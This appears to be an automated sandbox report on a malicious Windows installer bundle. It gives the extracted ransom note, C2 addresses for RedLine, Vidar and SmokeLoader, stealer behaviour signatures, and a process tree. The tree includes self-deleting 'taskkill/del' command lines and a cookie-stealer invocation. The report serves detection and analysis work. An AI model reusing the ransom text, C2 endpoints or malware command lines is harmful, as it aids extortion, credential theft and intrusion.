Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
11/07/2024, 05:43
240711-gej4lstgrf 1006/09/2021, 14:13
210906-rjpvrsedbm 1008/07/2021, 11:08
210708-4gztl3mwl6 1008/07/2021, 08:02
210708-klfb4qeda6 1007/07/2021, 09:39
210707-nem57xyvf2 1006/07/2021, 17:51
210706-7pcrmjy3fa 1006/07/2021, 13:45
210706-eybelwcq86 10Analysis
-
max time kernel
1801s -
max time network
1811s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
25/06/2021, 01:11
General
-
Target
setup_x86_x64_install - копия (20).exe
Score
10/10
Malware Config
Extracted
Path
C:\_readme.txt
Ransom Note
ATTENTION!
Don't worry, you can return all your files!
All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees you have?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information.
You can get and look video overview decrypt tool:
https://we.tl/t-Z9xOWordyu
Price of private key and decrypt software is $980.
Discount 50% available if you contact us first 72 hours, that's price for you is $490.
Please note that you'll never restore your data without payment.
Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.
To get this software you need write on our e-mail:
[email protected]
Reserve e-mail address to contact us:
[email protected]
Your personal ID:
0306ewgfDdppmn5q6DzrybvhIkCuuqaearFxJ8Rc3difSaWft1
URLs
https://we.tl/t-Z9xOWordyu
Extracted
Family
redline
Botnet
ServAni
C2
87.251.71.195:82
Extracted
Family
vidar
Version
39.4
Botnet
706
C2
https://sergeevih43.tumblr.com
Attributes
-
profile_id
706
Extracted
Family
smokeloader
Version
2020
C2
http://ppcspb.com/upload/
http://mebbing.com/upload/
http://twcamel.com/upload/
http://howdycash.com/upload/
http://lahuertasonora.com/upload/
http://kpotiques.com/upload/
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
rc4.i32
rc4.i32
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
39.4
Botnet
932
C2
https://sergeevih43.tumblr.com
Attributes
-
profile_id
932
Extracted
Family
vidar
Version
39.4
Botnet
865
C2
https://sergeevih43.tumblr.com
Attributes
-
profile_id
865
Signatures
-
CryptBot
A C++ stealer distributed widely in bundle with other software.
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 6 IoCs
-
ASPack v2.12-2.42 8 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 40 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 18 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 6 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 13 IoCs
-
Drops file in Program Files directory 48 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
-
Checks SCSI registry key(s) 3 TTPs 30 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 6 IoCs
-
Enumerates system info in registry 2 TTPs 5 IoCs
-
Kills process with taskkill 6 IoCs
-
Modifies Internet Explorer settings 1 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 15 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 10 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (20).exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (20).exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_7.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_7.exearnatic_7.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_6.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_5.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_4.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_3.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_2.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_1.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\frhhiwiC:\Users\Admin\AppData\Roaming\frhhiwi2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Roaming\fthhiwiC:\Users\Admin\AppData\Roaming\fthhiwi2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\fthhiwiC:\Users\Admin\AppData\Roaming\fthhiwi3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Roaming\fthhiwiC:\Users\Admin\AppData\Roaming\fthhiwi2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\fthhiwiC:\Users\Admin\AppData\Roaming\fthhiwi3⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
-
-
-
C:\Users\Admin\AppData\Roaming\frhhiwiC:\Users\Admin\AppData\Roaming\frhhiwi2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
-
-
C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exeC:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exeC:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exe --Task3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
-
-
C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exeC:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exeC:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exe --Task3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
-
-
C:\Users\Admin\AppData\Roaming\frhhiwiC:\Users\Admin\AppData\Roaming\frhhiwi2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
-
-
C:\Users\Admin\AppData\Roaming\fthhiwiC:\Users\Admin\AppData\Roaming\fthhiwi2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\fthhiwiC:\Users\Admin\AppData\Roaming\fthhiwi3⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
-
-
-
C:\Users\Admin\AppData\Roaming\hjhhiwiC:\Users\Admin\AppData\Roaming\hjhhiwi2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
-
-
C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exeC:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exeC:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc\334E.exe --Task3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe2⤵
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_4.exearnatic_4.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_1.exearnatic_1.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_1.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im arnatic_1.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_5.exearnatic_5.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7006689.exe"C:\Users\Admin\AppData\Roaming\7006689.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4556 -s 9363⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Roaming\2522565.exe"C:\Users\Admin\AppData\Roaming\2522565.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\4704316.exe"C:\Users\Admin\AppData\Roaming\4704316.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\1931028.exe"C:\Users\Admin\AppData\Roaming\1931028.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_6.exearnatic_6.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Documents\AJnVzDn5Yd7FO83Tk0TJdpGA.exe"C:\Users\Admin\Documents\AJnVzDn5Yd7FO83Tk0TJdpGA.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\AJnVzDn5Yd7FO83Tk0TJdpGA.exe"C:\Users\Admin\Documents\AJnVzDn5Yd7FO83Tk0TJdpGA.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Documents\VJDpgX8XSvSeyBetT2C8kLfl.exe"C:\Users\Admin\Documents\VJDpgX8XSvSeyBetT2C8kLfl.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im VJDpgX8XSvSeyBetT2C8kLfl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\VJDpgX8XSvSeyBetT2C8kLfl.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im VJDpgX8XSvSeyBetT2C8kLfl.exe /f4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Documents\81SjQ8Y8_P7QY6tFe6NZs8vS.exe"C:\Users\Admin\Documents\81SjQ8Y8_P7QY6tFe6NZs8vS.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2184.0.446543628\1936064724" -parentBuildID 20200403170909 -prefsHandle 1512 -prefMapHandle 1504 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2184 "\\.\pipe\gecko-crash-server-pipe.2184" 1592 gpu5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2184.3.189641118\548267170" -childID 1 -isForBrowser -prefsHandle 5496 -prefMapHandle 5492 -prefsLen 156 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 2184 "\\.\pipe\gecko-crash-server-pipe.2184" 5508 tab5⤵
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"3⤵
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc15804f50,0x7ffc15804f60,0x7ffc15804f704⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1536 /prefetch:24⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1764 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2484 /prefetch:14⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2492 /prefetch:14⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:14⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:14⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:14⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:14⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4032 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings4⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff78787a890,0x7ff78787a8a0,0x7ff78787a8b05⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4884 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5508 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5364 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5108 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3312 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5476 /prefetch:84⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1400,6123523737983498057,10793194530559915539,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5408 /prefetch:84⤵
-
